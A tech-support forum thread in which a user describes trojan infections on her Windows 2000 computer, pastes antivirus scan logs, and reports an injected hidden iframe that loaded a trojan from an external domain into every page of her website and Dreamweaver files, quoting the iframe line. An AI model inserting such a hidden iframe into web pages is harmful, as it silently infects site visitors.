svchost.exe & Trojans

I have some serious infections on my computer. I have downloaded BitDefender and this is the message I get when I try to run the program:

"The installation package could not be opened. Contact the application vendor to verify that this is a valid Windows installer package. The set up process could not be completed due to an internal error. If this is a fresh install, please scan with the 'BitDefender on-line scanner' and try to install the product again."

I did this. Then I got this report back.
Scan Info
Scanned Files 84384
Infected Files 4
Virus Detected
Trojan.PWS.LDPinch.TEZ 1
GenPack:Generic.Onlinegames.5.7451E862 1
Trojan.Agent.AGHO 1
BehavesLike:Win32.Malware 1

And this one:
Scanned File


Status

C:\Recycled\svchost.exe


Suspected of: BehavesLike:Win32.Malware

C:\Recycled\svchost.exe


Disinfection failed

C:\Recycled\svchost.exe


Delete failed

C:\WINNT\system\sslxpes071227.exe


Infected with: GenPack:Generic.Onlinegames.5.7451E862

C:\WINNT\system\sslxpes071227.exe


Disinfection failed

C:\WINNT\system\sslxpes071227.exe


Deleted

C:\WINNT\system32\svchost.exe


Infected with: Trojan.PWS.LDPinch.TEZ

C:\WINNT\system32\svchost.exe


Disinfection failed

C:\WINNT\system32\svchost.exe


Delete failed

C:\WINNT\system32\vnqsup.dll


Infected with: Trojan.Agent.AGHO

C:\WINNT\system32\vnqsup.dll


Disinfection failed

C:\WINNT\system32\vnqsup.dll


Delete failed

---
I downloaded this one, too:
FixIEDef.exe
And when I double click, it goes through a quick upload, and does absolutely nothing.

I have run Ad-aware and Trojan Remover and SpyBot. I have Avira as an anti-virus, but this whole machine got infected anyway. I get svchost.exe error messages and it goes to blue screen when I am trying to shut down and when I turn the machine on, it takes several tries to get it up and going because of svchost.exe errors.

Is there anything I can do now?

Thanks,
Helen

 

Hello,
I followed the directions you provided with the exception of the AVG scan. I didn't see the special instructions for saving the log, and now I don't have one. But I went to the Quarantine section and copied that and pasted it into a jpg. It's attached with the other two logs requested.

My dial-up link is missing. I have it on the desktop, but when I double click, the message says "Not Found." My Add Remove Programs comes up and when I click it, nothing happens. Worse, I cannot get it to close, so it hangs out on the screen until I open something on top of it. My Unplug Icon doesn't work like it used to. If I add a camera while the computer's on, the Icon doesn't appear. I have to go through a lot to close the camera or external drive. I have been getting error messages when I start the computer that the svchost.exe has errors and will be closed. Earlier, I got a message from I think AVG that my link library mscoree.dll is not found.

I don't know how this started precisely. I was working on my blog, which is a Word Press blog through my server, acornhost, and I started getting a lot of links from a spammer who was selling pharmaceuticals. I deleted them, but noticed I suddenly had a "permalink" on some of my entries in my blog. I don't know what that is, and I couldn't get rid of them. One night, my blog just went crazy and I could only see the entry I'd just written, the layout was missing widgets and was corrupt. This was on IE. When I viewed my blog on Firefox, which I now am only using, it came out as a normal looking blog. But no matter where I look at my blog with IE, it is corrupt. (www.dobermannpinscher.org/WordPress) I redownloaded the skin, thinking that would bring the blog back into order, but it did not. Now I have an ugly skin on it just to make it work halfway decent.

A friend told me to delete all my Quarantined stuff one night, and so I did. I think that was thru AdAware. Well, the computer was infected before then, but when I deleted the stuff, that's when there were many missing parts - like the dial-up icon didn't work and the add/remove programs went away. I cannot tell everything that isn't working, but the machine is limping along. Whatever I do on it has a longer process to get to than before when my links to desktop icons or start-menu icons worked.

I have something called Avira Anti-Virus. It's a free program that doesn't seem to have worked quite so well.

I got this computer from someone who donates time and refurbishes old computers to people involved in dog rescue. It had been working fine for the couple months I had it and then this catastrophe took place. Do you suppose I can fix it?

Thanks,
Helen

 

OK, Tim.
Logs are attached as requested.
Thank you,
Helen

 

Hi Tim,
I don't know what C:\gz is. I right clicked on it and ran it through my Avira antivirus, AVG antispyware, and the trojan remover and all three said it didn't pose a threat.

My dial-up link is still missing. I have it on the desktop, but when I double click, the message says "Not Found." My Add Remove Programs comes up and when I click it, nothing happens still. I have been getting error messages when I start the computer that the svchost.exe has errors and will be closed. If I don't let the machine do it's whole start up, which takes a very long time, including waiting for the svchost.exe error log message to be closed on its own, when I get into dial-up, my computer cannot find the interface for the modem connection, and I have to start the whole process over - reboot. It's very very long.

Since running these scans, my computer will not shut down. It goes to a blue screen and stays there. I have to unplug it to get it to stop.

When I booted up this last time, I got a message from Avira that C:\avenger\irhcjj.dll has a dangerous backdoor program BDS/Pcclient.atg. I chose to deny access. It doesn't matter what I do to that program, deny access, ignore, quarantine, it always comes back.

My link library mscoree.dll is still not found. Really, nothing's changed. Just the machine won't shut down on its own now.

The two logs you requested are attached.

Thank you,
Helen

 

I followed the instructions above.
The shortcut idea didn't work. The message was that the file shutdown couldn't be found.

The c drive check gave the message "Type of file system NTFS. The Volume is clean."

No, I don't have the windows cd. Do I need it?

svchost.exe still gives error message and machine still won't shut down unless I unplug it. What a mess.

Thanks,
Helen

 

I don't know what BSOD is.

I didn't buy this machine at a store. A man refurbishes them from his work when they get new ones and gives them to people who do rescue. He put all the software on and sent it to me.

 

I sent my computer back to my friend and he did a complete re-installation of everything from the Windows 2000 to all the software. I had BitDfender AV on it till last night when I changed it to BitDefender Internet Security, which includes the AV. The second night I went on-line, I had one window opened, my blog. The night before, I updated my website. While working in Word Press, I noticed something was going on with the formatting, it was behaving oddly, so I cut my whole entry, pasted it in Word, then back in Word Press. Somewhere during this time, I had my first warning that there was this TROJAN HACKTOOL AGENT BE around. Next morning, I ran a scan and got this message
C:\WINNT\system32\config\7fb8a36515353baa56fedadb218604e5\smss.exe
Trojan.Hacktool.Agent.BE
Deleted.

That Trojan.Hacktool.Agent.BE keeps coming up ... the BitDefender keeps telling me it's detected it and either deleted it or access denied. Computer's running slow. Is this going to be a permanent problem on this hard drive? I don't know where that thing is coming form or how to get rid of it permanently. Especially after the whole system was redone.

Is there a way to do a scan of my files on my Dreamweaver FTP server (not sure if that's the right terminology)...but my files that are for my website and blog?

Thanks,
Helen

 

Hi Tim,
This morning, at work, I went onto my website and their McAfee AVERT AV program popped up! My website has the trojan on it! I've attaced three things. One is the log from McAfee for just this morning, and at the end is the findings for the two major threats McAfee warned about. The other two pieces are halves of a whole. It's the screen that popped up to warn me about this.

I have no idea what to do. How do I get my website clean? How do I keep it from being infected again? How did it get infected? I wonder if it is in DreamWeaver. This is very confusing. My website is nonprofit, so I don't want people to get infected either. Should I shut it down for now?

Thank you for your help,
Helen

 

I will do all that you suggest. I wanted to offer something the help desk from my server sent me to do:
It appears your webpage is loading the site http://internet.wpvgm.com/cuteqqcn.htm at the bottom of the index.html. This could be caused by compromised software on your computer. If you remove the iframe tag with that URL it should stop trying to load a Trojan upon visit to the site.

I'm going to that first thing when I get home because I don't want visitors to my website getting trojans. I don't think that will fix the computer, though, but just wanted to give you all the information I have.

Thanks,
Helen

 

I did what you asked. The on-line scan came out clean, which is ridiculous. But then again, I have Bit Defender Internet Security on my computer and the trojan has changed its configuration. I used to be able to right click on a file, choose send to, and Bit Defender was there to scan. That lasted a few hours and I can no longer send to Bit Defender - that option has disappeared.

I keep getting pop-ups from Bit Defender that it is protecting my computer and it has thwarted another attempt of an trojan attact to my docs/temp....but I don't think so.

Last night, I went into DreamWeaver to remove that line of text, and I could NOT remove it successfully. When I did remove it and uploaded the index, the line reappeared. It didn't matter which side of DreamW I used, the line reappeared. So I went onto the server, and closed DW. On the server I removed the text, and it stuck.

Afterwards, I came back into my computer to delete as many temp files as I could. I found the "index" file and deleted it. Either I couldn't delete it or it would look like it deleted only I would find it elsewhere.

Helen

 

What I see is this. When I open Dreamweaver 4, and I open the INDEX on my C drive for my website, that malware website address I referenced earlier is STILL embedded in the bottom of the index. I delete it, save, and it pops back up in the same place in the INDEX. THAT is infuriating. How can someone make that happen? I can't update my website now because that thing is there and has control.

This is where a file was deleted today during the scan - and just about everytime I run a scan it is supposedly deleted, but yet, here it is again. And this is where one of the two pop-ups from BitDefender keep saying it's deleted or blocked the TrojanBackDoor Agent BE.

C:\WINNT\system32\config\7fb8a36515353baa56fedadb218604e5\smss.exe Trojan.Hacktool.Agent.BE
Deleted

Helen

 

More -

Remaining issues:Object Name Threat Name Final Status
[System]=]HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\SERVICES\AUTHORIZATION\PARAMETERS\ServiceDll=]C:\WINNT\SYSTEM32\FWTCWAICSLNVVAJCXSTO.DLL Trojan.Downloader.Agent.ZBP No action was possible

C:\WINNT\system32\FWTCWAicsLnVVaJcxsTo.dll Trojan.Downloader.Agent.ZBP Move to Quarantine Failed


Resolved issues:Object Name Threat Name Final Status
C:\WINNT\system32\config\7fb8a36515353baa56fedadb218604e5\smss.exe Trojan.Hacktool.Agent.BE Deleted

 

Hello Tim,
I followed the directions above, and got an error message about the log not being able to ZIP. But something strange happened last night, and then something stupid happened.

The strange thing was there was a sudden peace in the computer that wafted through me and all over the house. I went on-line and did not get one single pop-up message from BitDefender that my computer was being attacked and that it was defending it.

This was after I did the avenger AND I went back into DreamWeaver, which to me is the Devil at this time. Dreamweaver holds the key to this beast. In EVERY single HTML document is that line I posted earlier...
<iframe src="**** :// internet.wpvgm.com/cuteqqcn.***" width="0" height="0" frameborder="0"></iframe>

I mean EVERY one. Their templates, the pages I built, and whenever I opened DW, a new document would pop up and that code was on the bottom. The difference now from then was that I deleted that code from all my pages and it stayed deleted this time. However it is everywhere. I found a folder named Template (or something like that) and inside was an html doc that was where all the new documents were drawn from. I deleted it, and when I opened up a new document, there was no more of that code. I went through all of my pages and did that. I closed DW and went online, then went off line.

I thought about deleting the whole DW program, but didn't want to do that, so I opened DW up again and opened some of its pre-installed html pages. The first one I opened, came up in the Firefox page and asked if I would go on-line, but I said no. I managed to change the source code there and saved it. I opened that page again, and it was gone. Here comes the stupid part...but really, I didn't know this would happen.

I opened up the next page, and when given a choice, I went into WORD to change the code. But when the page was loading, there was a flash on the page that said "Preparing to Install..." That's when I shut down WORD immediately. And DW afterwards. I didn't see anything happening, but I don't know if it did or not behind the scenes.

I then went into BitDefender and ran that scan and for once, it came up clean.

This morning, I brought my external hard drive to work and looked at all my html files I'd saved from DW when I sent my computer off to get all the software, and OE re-installed...sure enough, all the pages have that code on it! The software at work, McAffee, is catching this code when I open the document up. But why, when I scanned my entire external hard drive here at work, does it not catch that line as malicious code?

I have not opened my computer since the WORD incident and my post BD scan last night. I am hoping the scan proves correct and that the malicious program didn't install. I will find out later. But I did do a websearch this morning on the code above, and besides my post here, I found one page in German that I translated...this person is having the same problem. And what I can get from the gist of the conversation is this is a new trojan. It's here.
http://translate.google.com/transla...reamweaver+internet.wpvgm.com/cuteqqcn.&hl=en

One other thing on this and I think it is key. I was using bravenet for the counter on my regular website. Then I added a bravenet counter to my blog. What was weird was that even though I told bravenet NOT to count my visits to the site, everytime I visited my site, the counter went up, which caused me to go into bravenet where I had to change the settings. And everytime I changed the settings not to count me, the next day, the setting reverted and I had to either leave it or be counted. I went into bravenet a lot to fix this. In the meantime, the code for my counter disappeared one day on my website. And after I added bravenet's counter code to my blog, my blog went haywire. I am trying to piece all this together. But the malicious code put itself right on the bottom of the page under the absent bravenet counter code. Is this a "counter trojan?" Does it come from bravenet's site? I don't know, but I removed bravenet counters from both blog and website, and I installed one from another site.

I wanted to give you all the information I have on this because someone else may find themselves in this same situation.

Bottom line now is would you know of a way to remove that code from all the DW html files? I fear leaving one strand of it behind will cause havoc sooner or later.

Thank you for your help,
Helen

 

Tim,
Can you help me out? I don't know what to do with all the boxes. How do I run it?
Thanks,
Helen

 

>>Download....unzip ...click on the exe file to install ,,,you should get a config panel ....set to recommended and then if you want to check a vbe or other scrip click on the test program and paste in the file.<<

There are no "recommended" boxes. I don't know what vbe is or other script or why am I picking boxes? You're giving me way too much credit for knowing how to run this program.

On the webpage it says:
"Windows Scripting Host (WSH) is a double-edged sword. On one hand it can be used to make some very useful scripts to automate common Windows functions (for example, the Spell Checker script from PC911). On the other hand, it can be very easy for a malicious user to make a virus using WSH."

I don't feel comfortable picking boxes on my own or running this program from what I read above. I don't understand what we are trying to do with the program. What is this program for? Will it help me get rid of that line of HTML I still have on every HTML file? In my external hard drive alone, I found 1973 instances of that text. My computer hasn't had a virus pop-up since I ran the program previous to this one, but I am being very careful not to open any HTML files on my system.

Can you give me some additional information?

Thank you,
Helen